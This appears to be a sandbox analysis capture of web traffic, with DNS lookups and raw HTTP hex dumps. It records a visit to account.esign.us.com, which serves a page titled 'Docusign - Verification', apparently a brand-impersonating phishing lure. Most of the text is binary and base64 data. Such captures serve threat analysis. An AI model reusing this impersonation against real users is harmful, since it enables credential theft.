Preview:	wOF2......_0.......X..^...........................P...H..p.`?STATZ..>.....x.._.....6.$.... ...........7.nS.....@.J}6/.....C.7+6r..Yt...........?'9.1...OU.(...d2%gM%J..D...(%.2...E.<.s..;..m.6.nLQ^wd;.....Ohp..AR ...dHl.....[t..\|pTQ...6).....D..q.`-{.w\.^..{...........j..\..../8......+L.l.[....v.....8...WW..>..Y.n=.. G.L...8......]sG.....R...".....dI..-%6 ...i..2..",.,...'..0<....V...CjT-...fl..0F..m..-YF.`!"(z.ND...o.......(..G......Il...g\..P.D....{..................j+.q....8.6.N.w..8..{..8.....<......).....9.}.L.)<....S.v.Y.Y\.ng!........?.}./.t.B@(X..r.^5i.......//.._..c...A..y..E.....1........-....D..{"...L...3..>............J.S.f.MD....6/EBZ[6.W.P.......,...d..ll.X.#...@.%....h.......pc....m...s.X.B.:.K.ZI>-&."9DE............Dc..-C......D._.H<.i.A..!...PEPT..>[....k..-.......I}....U...6.@..t..C..g....5..m.....-.h.....:....gxp`.....0.Q6..Yax7Nb.?. 9...c....I.1......l............PL"........}.......(.c?...4.'....R.~.f'.....GR...P..M....

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 21, 2025 18:44:27.924280882 CET	192.168.2.6	1.1.1.1	0x6834	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:27.924544096 CET	192.168.2.6	1.1.1.1	0x8e77	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 21, 2025 18:44:29.010727882 CET	192.168.2.6	1.1.1.1	0x65ff	Standard query (0)	account.esign.us.com	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:29.013665915 CET	192.168.2.6	1.1.1.1	0x8caa	Standard query (0)	account.esign.us.com	65	IN (0x0001)	false
Mar 21, 2025 18:44:29.701042891 CET	192.168.2.6	1.1.1.1	0xaf74	Standard query (0)	cdn.jsdelivr.net	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:29.701426029 CET	192.168.2.6	1.1.1.1	0x6ac9	Standard query (0)	cdn.jsdelivr.net	65	IN (0x0001)	false
Mar 21, 2025 18:44:30.084924936 CET	192.168.2.6	1.1.1.1	0x12e1	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:30.085071087 CET	192.168.2.6	1.1.1.1	0x443d	Standard query (0)	play.google.com	65	IN (0x0001)	false
Mar 21, 2025 18:44:30.592247009 CET	192.168.2.6	1.1.1.1	0xc715	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:30.592390060 CET	192.168.2.6	1.1.1.1	0x51a7	Standard query (0)	play.google.com	65	IN (0x0001)	false
Mar 21, 2025 18:44:42.969039917 CET	192.168.2.6	1.1.1.1	0xf02b	Standard query (0)	upload.wikimedia.org	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:42.969244003 CET	192.168.2.6	1.1.1.1	0x9b1d	Standard query (0)	upload.wikimedia.org	65	IN (0x0001)	false
Mar 21, 2025 18:44:43.436299086 CET	192.168.2.6	1.1.1.1	0x6512	Standard query (0)	account.esign.us.com	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:43.591180086 CET	192.168.2.6	1.1.1.1	0x6ad0	Standard query (0)	upload.wikimedia.org	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:43.591464996 CET	192.168.2.6	1.1.1.1	0xf021	Standard query (0)	upload.wikimedia.org	65	IN (0x0001)	false
Mar 21, 2025 18:44:56.329937935 CET	192.168.2.6	1.1.1.1	0x916e	Standard query (0)	account.esign.us.com	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:45:32.427767038 CET	192.168.2.6	1.1.1.1	0x7350	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:45:32.427902937 CET	192.168.2.6	1.1.1.1	0xf418	Standard query (0)	google.com	65	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 21, 2025 18:44:28.030550003 CET	1.1.1.1	192.168.2.6	0x8e77	No error (0)	www.google.com			65	IN (0x0001)	false
Mar 21, 2025 18:44:28.030592918 CET	1.1.1.1	192.168.2.6	0x6834	No error (0)	www.google.com		142.251.40.196	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:29.140876055 CET	1.1.1.1	192.168.2.6	0x65ff	No error (0)	account.esign.us.com		44.203.127.19	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:29.802022934 CET	1.1.1.1	192.168.2.6	0x6ac9	No error (0)	cdn.jsdelivr.net	jsdelivr.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 21, 2025 18:44:29.803500891 CET	1.1.1.1	192.168.2.6	0xaf74	No error (0)	cdn.jsdelivr.net	jsdelivr.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 21, 2025 18:44:29.803500891 CET	1.1.1.1	192.168.2.6	0xaf74	No error (0)	jsdelivr.map.fastly.net		151.101.193.229	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:29.803500891 CET	1.1.1.1	192.168.2.6	0xaf74	No error (0)	jsdelivr.map.fastly.net		151.101.129.229	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:29.803500891 CET	1.1.1.1	192.168.2.6	0xaf74	No error (0)	jsdelivr.map.fastly.net		151.101.65.229	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:29.803500891 CET	1.1.1.1	192.168.2.6	0xaf74	No error (0)	jsdelivr.map.fastly.net		151.101.1.229	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:30.186463118 CET	1.1.1.1	192.168.2.6	0x12e1	No error (0)	play.google.com		172.217.165.142	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:30.692590952 CET	1.1.1.1	192.168.2.6	0xc715	No error (0)	play.google.com		142.251.40.142	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:43.109517097 CET	1.1.1.1	192.168.2.6	0xf02b	No error (0)	upload.wikimedia.org		208.80.154.240	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:43.569705009 CET	1.1.1.1	192.168.2.6	0x6512	No error (0)	account.esign.us.com		44.203.127.19	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:43.698257923 CET	1.1.1.1	192.168.2.6	0x6ad0	No error (0)	upload.wikimedia.org		208.80.154.240	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:44:56.478513002 CET	1.1.1.1	192.168.2.6	0x916e	No error (0)	account.esign.us.com		44.203.127.19	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:45:32.533251047 CET	1.1.1.1	192.168.2.6	0x7350	No error (0)	google.com		142.251.40.238	A (IP address)	IN (0x0001)	false
Mar 21, 2025 18:45:32.535382032 CET	1.1.1.1	192.168.2.6	0xf418	No error (0)	google.com			65	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2025-03-21 17:44:29 UTC	711	OUT	GET /documentWizard.html?Uv=4WaUN2Pkric74yNetF HTTP/1.1 Host: account.esign.us.com Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-21 17:44:29 UTC	247	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Fri, 21 Mar 2025 17:44:29 GMT Content-Type: text/html Content-Length: 287196 Last-Modified: Thu, 13 Mar 2025 03:35:46 GMT Connection: close ETag: "67d25292-461dc" Accept-Ranges: bytes
2025-03-21 17:44:29 UTC	16137	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 63 75 73 69 67 6e 20 2d 20 56 65 72 69 66 69 63 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Docusign - Verification</title> <link rel="icon" type="image/x-icon" href="data:image/x-icon
2025-03-21 17:44:29 UTC	16384	IN	Data Raw: 39 53 55 76 2f 2f 55 6c 4c 2f 2f 31 4a 53 2f 2f 39 53 55 76 2f 2f 55 6c 4c 2f 2f 31 4a 53 2f 2f 39 53 55 76 2f 2f 55 6c 4c 2f 2f 31 4a 53 2f 2f 39 53 55 76 2f 35 55 56 48 2f 38 66 38 41 53 39 58 2f 41 45 76 66 2f 77 42 4c 35 76 38 41 53 2b 62 2f 41 45 76 6d 2f 77 42 4c 35 76 38 41 53 2b 62 2f 41 45 76 6d 2f 77 42 4c 35 76 38 41 53 2b 62 2f 41 45 76 6d 2f 77 42 4c 35 76 45 41 53 65 68 32 42 54 44 31 48 77 63 65 2f 67 6b 48 47 50 38 48 42 78 66 2f 42 77 63 58 2f 77 63 48 46 2f 38 48 42 78 66 2f 42 77 63 58 2f 77 63 48 46 2f 38 48 42 78 66 2f 42 77 63 58 2f 77 63 48 46 2f 38 49 43 42 6a 2f 44 67 34 71 2f 78 77 63 57 66 38 33 4e 36 7a 2f 53 6b 72 6e 2f 31 4a 53 2f 2f 39 53 55 76 2f 2f 55 6c 4c 2f 2f 31 4a 53 2f 2f 39 53 55 76 2f 2f 55 6c 4c 2f 2f 31 4a 53 2f Data Ascii: 9SUv//UlL//1JS//9SUv//UlL//1JS//9SUv//UlL//1JS//9SUv/5UVH/8f8AS9X/AEvf/wBL5v8AS+b/AEvm/wBL5v8AS+b/AEvm/wBL5v8AS+b/AEvm/wBL5vEASeh2BTD1Hwce/gkHGP8HBxf/BwcX/wcHF/8HBxf/BwcX/wcHF/8HBxf/BwcX/wcHF/8ICBj/Dg4q/xwcWf83N6z/Skrn/1JS//9SUv//UlL//1JS//9SUv//UlL//1JS/
2025-03-21 17:44:29 UTC	16384	IN	Data Raw: 6b 5a 47 52 6b 61 65 68 55 79 42 4f 7a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 76 49 73 5a 41 72 63 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 57 63 68 55 2b 43 4f 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 50 41 75 5a 41 6e 64 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 54 6b 57 63 67 55 75 43 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 50 50 51 71 62 41 48 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 58 6b 57 4d 67 58 75 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4c 4f 51 4b 58 42 48 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 6e 6f 56 4d 67 54 73 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 4c 79 4c 47 51 4b 33 4a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 46 6e 49 56 50 67 6a 6f 79 4d 6a 49 79 4d 6a 49 79 4d Data Ascii: kZGRkaehUyBOzIyMjIyMjIyMjIyMvIsZArckZGRkZGRkZGRkZGRkWchU+COjIyMjIyMjIyMjIyMPAuZAndkZGRkZGRkZGRkZGTkWcgUuCMjIyMjIyMjIyMjIyPPQqbAHRkZGRkZGRkZGRkZGXkWMgXuyMjIyMjIyMjIyMjIyLOQKXBHRkZGRkZGRkZGRkZGnoVMgTsyMjIyMjIyMjIyMjLyLGQK3JGRkZGRkZGRkZGRkZFnIVPgjoyMjIyMjIyM
2025-03-21 17:44:29 UTC	16384	IN	Data Raw: 38 7a 4a 64 52 6d 2f 49 38 78 31 58 44 49 32 61 71 38 4a 66 4c 65 34 54 63 79 4a 75 32 73 78 5a 2f 78 75 77 5a 7a 32 4a 41 38 30 2f 2b 53 63 4e 4f 37 53 44 32 30 77 33 72 6c 57 6a 51 74 74 75 4e 62 34 66 68 46 63 74 2f 4b 78 31 7a 6a 35 38 78 53 34 72 30 32 5a 41 76 65 4a 69 67 55 75 69 39 49 69 6c 36 38 72 53 34 77 2b 36 57 6a 31 36 79 2f 39 39 61 73 6b 6d 53 62 50 56 41 6d 70 54 37 6a 37 6c 4c 76 62 75 6f 6c 78 33 62 45 37 57 5a 41 59 6b 79 77 6c 2f 68 79 72 32 79 58 4a 30 31 5a 31 59 31 4f 54 66 46 65 36 73 37 58 6a 31 2f 62 32 75 47 34 77 62 55 76 47 7a 78 68 65 6d 6f 64 56 44 48 4d 4f 4f 74 35 70 43 7a 61 6b 48 56 37 62 2b 62 30 61 4b 2b 63 61 58 49 45 78 73 43 62 65 31 45 77 41 57 31 65 59 32 2f 6e 62 50 75 2f 6d 59 34 57 46 6a 49 46 2b 75 56 6c 6e Data Ascii: 8zJdRm/I8x1XDI2aq8JfLe4TcyJu2sxZ/xuwZz2JA80/+ScNO7SD20w3rlWjQttuNb4fhFct/Kx1zj58xS4r02ZAveJigUui9Iil68rS4w+6Wj16y/99askmSbPVAmpT7j7lLvbuolx3bE7WZAYkywl/hyr2yXJ01Z1Y1OTfFe6s7Xj1/b2uG4wbUvGzxhemodVDHMOOt5pCzakHV7b+b0aK+caXIExsCbe1EwAW1eY2/nbPu/mY4WFjIF+uVln
2025-03-21 17:44:29 UTC	16384	IN	Data Raw: 70 66 72 6a 74 73 78 33 4b 30 72 35 2f 4e 65 7a 50 56 63 4a 4f 59 61 64 39 31 32 46 62 2f 48 34 6a 72 58 6e 6c 77 48 78 6c 62 37 36 34 37 72 6e 47 4d 35 73 39 65 58 34 34 69 58 46 65 36 30 52 31 73 61 43 38 30 44 48 54 4f 75 4f 66 34 31 58 43 64 4f 47 39 2b 72 73 59 78 35 61 73 63 32 4e 54 48 6e 76 54 73 66 56 37 68 7a 6e 71 2f 42 33 42 48 75 78 46 7a 50 52 65 4a 61 75 37 6f 74 62 58 49 4e 59 45 74 6a 62 6f 55 37 66 55 2b 66 55 34 2b 34 54 73 77 31 37 6a 4b 76 57 2b 45 75 75 55 36 62 39 59 50 58 6e 4d 65 63 49 32 4d 6d 31 7a 48 2f 32 70 46 66 54 35 34 43 39 33 6e 49 46 4c 68 50 53 46 78 59 58 65 53 61 57 47 65 43 34 2b 4a 4f 6c 61 42 79 63 35 58 38 63 2f 50 77 36 30 67 6d 54 5a 37 57 5a 70 49 68 67 58 51 69 59 48 76 62 53 4e 4a 48 4e 75 77 30 69 61 72 74 Data Ascii: pfrjtsx3K0r5/NezPVcJOYad912Fb/H4jrXnlwHxlb7647rnGM5s9eX44iXFe60R1saC80DHTOuOf41XCdOG9+rsYx5asc2NTHnvTsfV7hznq/B3BHuxFzPReJau7otbXINYEtjboU7fU+fU4+4Tsw17jKvW+EuuU6b9YPXnMecI2Mm1zH/2pFfT54C93nIFLhPSFxYXeSaWGeC4+JOlaByc5X8c/Pw60gmTZ7WZpIhgXQiYHvbSNJHNuw0iart
2025-03-21 17:44:29 UTC	16384	IN	Data Raw: 65 55 63 4f 4e 2b 74 50 54 64 48 32 6a 36 6e 44 36 6c 74 53 38 35 48 6a 74 66 74 30 34 2f 32 49 57 31 59 78 61 33 48 61 72 39 32 37 57 36 4a 64 59 36 31 69 33 58 72 70 58 46 58 6d 75 50 59 76 32 4e 30 37 4e 56 56 44 4e 75 2b 6e 72 4f 56 4c 65 33 72 4e 5a 70 6a 5a 66 77 62 61 30 38 4a 63 78 30 44 32 33 66 62 74 49 4e 72 52 2f 64 66 34 72 70 73 65 32 75 38 32 39 2b 63 31 35 32 74 50 57 61 4f 75 31 4c 48 73 57 2f 37 37 39 69 6e 74 6c 31 74 57 38 2f 5a 79 70 61 32 38 52 72 74 38 58 49 4f 47 6d 2b 33 34 71 35 39 54 72 39 7a 33 4c 61 6c 37 56 6a 68 62 74 55 32 34 39 56 32 72 4f 4a 32 37 31 6a 33 78 4c 76 6a 76 4c 4c 7a 79 4e 37 47 32 45 72 54 70 78 78 6a 46 58 2f 56 4d 64 71 32 62 4e 76 33 74 6b 33 74 36 30 6f 37 68 6a 31 65 7a 6b 48 6a 37 52 62 4d 47 62 2f 57 Data Ascii: eUcON+tPTdH2j6nD6ltS85Hjtft04/2IW1Yxa3Har927W6JdY61i3XrpXFXmuPYv2N07NVVDNu+nrOVLe3rNZpjZfwba08Jcx0D23fbtINrR/df4rpse2u829+c152tPWaOu1LHsW/779intl1tW8/Zypa28Rrt8XIOGm+34q59Tr9z3Lal7VjhbtU249V2rOJ271j3xLvjvLLzyN7G2ErTpxxjFX/VMdq2bNv3tk3t60o7hj1ezkHj7RbMGb/W
2025-03-21 17:44:29 UTC	16384	IN	Data Raw: 43 48 74 74 47 50 64 76 71 57 64 50 61 38 39 5a 6f 35 37 53 56 66 2b 5a 78 7a 61 70 31 30 4d 38 39 70 44 62 57 72 62 57 6e 73 73 62 44 7a 43 33 44 57 34 53 7a 2f 62 33 78 79 37 37 55 74 2f 64 2f 32 74 2b 75 69 32 50 57 36 50 6c 37 37 76 78 75 70 32 6a 62 48 57 6a 6e 66 37 6c 6d 50 75 62 46 32 4e 65 34 33 75 2b 75 33 59 32 66 39 71 4c 72 4b 50 37 43 66 76 37 58 47 76 30 52 36 6a 78 39 4c 4f 78 4e 63 4b 64 7a 31 48 4b 2b 31 59 74 76 32 70 71 37 6a 5a 54 34 35 33 31 45 66 48 4b 6d 31 59 78 63 77 32 65 58 2b 50 6b 2f 61 68 6a 62 4e 37 4d 4c 65 79 74 57 50 55 34 31 37 53 37 44 66 37 61 70 2f 73 2f 31 49 4d 75 35 39 37 62 46 72 5a 64 7a 53 57 63 37 33 44 33 47 50 6a 4c 6d 31 4c 66 31 66 39 5a 66 76 32 71 32 50 56 4d 65 76 37 73 30 32 50 6b 2b 32 79 62 57 4e 74 Data Ascii: CHttGPdvqWdPa89Zo57SVf+Zxzap10M89pDbWrbWnssbDzC3DW4Sz/b3xy77Ut/d/2t+ui2PW6Pl77vxup2jbHWjnf7lmPubF2Ne43u+u3Y2f9qLrKP7Cfv7XGv0R6jx9LOxNcKdz1HK+1Ytv2pq7jZT4531EfHKm1Yxcw2eX+Pk/ahjbN7MLeytWPU417S7Df7ap/s/1IMu597bFrZdzSWc73D3GPjLm1Lf1f9Zfv2q2PVMev7s02Pk+2ybWNt
2025-03-21 17:44:29 UTC	16384	IN	Data Raw: 4e 75 64 32 6b 66 58 76 5a 30 32 57 2b 32 75 59 74 63 74 36 66 47 32 78 6e 58 4d 6d 38 68 31 53 4d 2f 2f 75 71 58 48 32 35 4a 75 64 32 6f 66 58 66 64 4f 74 4c 6d 71 62 56 74 36 76 4e 35 58 56 72 4c 53 72 66 32 2b 30 71 2f 48 4f 6e 55 38 5a 63 72 4e 4c 70 50 67 58 6c 6a 70 42 66 69 66 6c 43 61 4b 4c 65 6c 32 35 30 6a 33 74 53 56 64 56 30 4a 7a 34 2f 58 55 63 66 57 34 55 44 2b 61 35 59 61 38 49 73 73 56 63 62 59 75 4b 7a 31 4f 62 64 76 7a 76 36 70 63 52 35 2b 74 32 30 71 36 7a 5a 32 57 48 76 2b 51 64 4e 74 7a 70 50 74 71 32 61 71 6a 6e 38 46 50 6e 6e 53 76 4d 43 66 75 74 6b 37 64 56 37 4b 46 6d 39 5a 68 4d 48 65 39 30 6a 70 73 53 62 63 37 52 37 71 76 55 79 55 78 31 31 78 33 6e 5a 68 62 59 61 66 31 53 4d 77 64 77 6d 76 50 2f 61 72 53 2f 56 36 31 37 2b 35 6a Data Ascii: Nud2kfXvZ02W+2uYtct6fG2xnXMm8h1SM//uqXH25Jud2ofXfdOtLmqbVt6vN5XVrLSrf2+0q/HOnU8ZcrNLpPgXljpBfiflCaKLel250j3tSVdV0Jz4/XUcfW4UD+a5Ya8IssVcbYuKz1Obdvzv6pcR5+t20q6zZ2WHv+QdNtzpPtq2aqjn8FPnnSvMCfutk7dV7KFm9ZhMHe90jpsSbc7R7qvUyUx11x3nZhbYaf1SMwdwmvP/arS/V617+5j
2025-03-21 17:44:30 UTC	16384	IN	Data Raw: 36 69 6e 53 68 50 45 53 72 72 4e 4d 65 6e 32 4b 2b 6b 32 64 31 4a 36 37 43 33 70 64 6c 65 52 37 76 4d 55 30 64 63 6d 47 4a 79 61 39 6d 4d 33 71 38 65 4c 71 4a 65 4a 52 75 4e 6c 68 5a 32 65 61 2b 74 78 43 48 66 64 39 71 72 53 38 31 39 4a 74 7a 6b 6d 33 58 34 6c 33 65 5a 4f 53 6f 2b 39 6b 6d 35 7a 56 65 6c 2b 54 78 46 39 4b 75 5a 49 58 4c 63 77 4a 2b 37 45 58 4a 36 49 33 79 37 75 74 6a 42 33 71 4f 31 56 70 57 32 77 6b 6d 35 7a 54 4c 72 39 53 72 72 4e 6e 5a 51 65 75 36 58 72 33 34 35 30 33 79 76 70 4e 69 4d 6a 49 79 4f 58 4b 46 4e 75 52 70 6b 45 39 38 4b 4b 43 34 79 41 49 41 4f 2b 76 4b 4f 53 77 65 52 31 42 58 36 32 58 77 57 5a 50 63 59 70 59 33 56 2f 78 2f 72 73 39 74 63 70 71 66 4e 4b 6c 35 55 2b 74 36 50 58 56 63 64 43 75 47 35 69 53 79 4c 42 33 34 33 6b Data Ascii: 6inShPESrrNMen2K+k2d1J67C3pdleR7vMU0dcmGJya9mM3q8eLqJeJRuNlhZ2ea+txCHfd9qrS819Jtzkm3X4l3eZOSo+9km5zVel+TxF9KuZIXLcwJ+7EXJ6I3y7utjB3qO1VpW2wkm5zTLr9SrrNnZQeu6Xr34503yvpNiMjIyOXKFNuRpkE98KKC4yAIAO+vKOSweR1BX62XwWZPcYpY3V/x/rs9tcpqfNKl5U+t6PXVcdCuG5iSyLB343k
2025-03-21 17:44:30 UTC	16384	IN	Data Raw: 63 71 55 4b 56 4f 6d 54 4a 6b 79 35 55 61 55 53 58 43 6e 54 4a 6b 79 5a 63 71 55 4b 56 4f 6d 54 4a 6b 79 5a 63 71 4e 4b 4a 50 67 54 70 6b 79 5a 63 71 55 4b 56 4f 6d 54 4a 6b 79 5a 63 71 55 47 31 45 6d 77 5a 30 79 5a 63 71 55 4b 56 4f 6d 54 4a 6b 79 5a 63 71 55 4b 54 65 69 54 49 49 37 5a 63 71 55 4b 56 4f 6d 54 4a 6b 79 5a 63 71 55 4b 56 4e 75 52 4a 6b 45 39 79 34 73 2f 51 2b 6d 7a 35 45 70 55 36 35 53 47 6b 66 6e 79 70 51 70 56 79 6d 4e 6f 33 4e 6b 79 70 53 72 6c 73 62 53 4f 54 4a 6c 79 6c 56 4b 34 2b 67 63 6d 54 4a 6c 79 76 38 74 6b 2b 42 65 55 47 6e 53 75 68 74 6c 79 74 31 58 32 6f 64 33 6f 30 79 35 75 30 72 37 37 32 36 55 4b 58 64 66 61 52 2f 65 6a 54 4c 6c 37 69 72 74 76 37 74 52 70 6b 79 35 47 38 73 6b 75 42 64 55 6d 6c 52 53 2f 76 64 2f 2f 2f 66 4b Data Ascii: cqUKVOmTJky5UaUSXCnTJkyZcqUKVOmTJkyZcqNKJPgTpkyZcqUKVOmTJkyZcqUG1EmwZ0yZcqUKVOmTJkyZcqUKTeiTII7ZcqUKVOmTJkyZcqUKVNuRJkE9y4s/Q+mz5EpU65SGkfnypQpVymNo3NkypSrlsbSOTJlylVK4+gcmTJlyv8tk+BeUGnSuhtlyt1X2od3o0y5u0r7726UKXdfaR/ejTLl7irtv7tRpky5G8skuBdUmlRS/vd///fK

Timestamp	Bytes transferred	Direction	Data
2025-03-21 17:44:30 UTC	623	OUT	GET /npm/sweetalert2@11.6.15/dist/sweetalert2.min.css HTTP/1.1 Host: cdn.jsdelivr.net Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Sec-Fetch-Storage-Access: active Referer: https://account.esign.us.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-21 17:44:30 UTC	755	IN	HTTP/1.1 200 OK Connection: close Content-Length: 20713 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: * Timing-Allow-Origin: * Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable Cross-Origin-Resource-Policy: cross-origin X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Type: text/css; charset=utf-8 X-JSD-Version: 11.6.15 X-JSD-Version-Type: version ETag: W/"50e9-83+8+I9XfzFSuOwRPYO4Q9xuK8g" Accept-Ranges: bytes Age: 85300 Date: Fri, 21 Mar 2025 17:44:30 GMT X-Served-By: cache-fra-eddf8230137-FRA, cache-lga21927-LGA X-Cache: HIT, MISS Vary: Accept-Encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2025-03-21 17:44:30 UTC	1378	IN	Data Raw: 2e 73 77 61 6c 32 2d 70 6f 70 75 70 2e 73 77 61 6c 32 2d 74 6f 61 73 74 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 31 2f 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 67 72 69 64 2d 72 6f 77 3a 31 2f 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 6d 69 6e 2d 63 6f 6e 74 65 6e 74 20 61 75 74 6f 20 6d 69 6e 2d 63 6f 6e 74 65 6e 74 3b 70 61 64 64 69 6e 67 3a 31 65 6d 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 68 69 64 64 65 6e 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 37 35 29 2c 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 37 Data Ascii: .swal2-popup.swal2-toast{box-sizing:border-box;grid-column:1/4 !important;grid-row:1/4 !important;grid-template-columns:min-content auto min-content;padding:1em;overflow-y:hidden;background:#fff;box-shadow:0 0 1px rgba(0,0,0,.075),0 1px 2px rgba(0,0,0,.07
2025-03-21 17:44:30 UTC	1378	IN	Data Raw: 2e 73 77 61 6c 32 2d 74 6f 61 73 74 20 2e 73 77 61 6c 32 2d 69 63 6f 6e 20 2e 73 77 61 6c 32 2d 69 63 6f 6e 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 73 77 61 6c 32 2d 70 6f 70 75 70 2e 73 77 61 6c 32 2d 74 6f 61 73 74 20 2e 73 77 61 6c 32 2d 69 63 6f 6e 2e 73 77 61 6c 32 2d 73 75 63 63 65 73 73 20 2e 73 77 61 6c 32 2d 73 75 63 63 65 73 73 2d 72 69 6e 67 7b 77 69 64 74 68 3a 32 65 6d 3b 68 65 69 67 68 74 3a 32 65 6d 7d 2e 73 77 61 6c 32 2d 70 6f 70 75 70 2e 73 77 61 6c 32 2d 74 6f 61 73 74 20 2e 73 77 61 6c 32 2d 69 63 6f 6e 2e 73 77 61 6c 32 2d 65 72 72 6f 72 20 5b 63 6c 61 Data Ascii: .swal2-toast .swal2-icon .swal2-icon-content{display:flex;align-items:center;font-size:1.8em;font-weight:bold}.swal2-popup.swal2-toast .swal2-icon.swal2-success .swal2-success-ring{width:2em;height:2em}.swal2-popup.swal2-toast .swal2-icon.swal2-error [cla
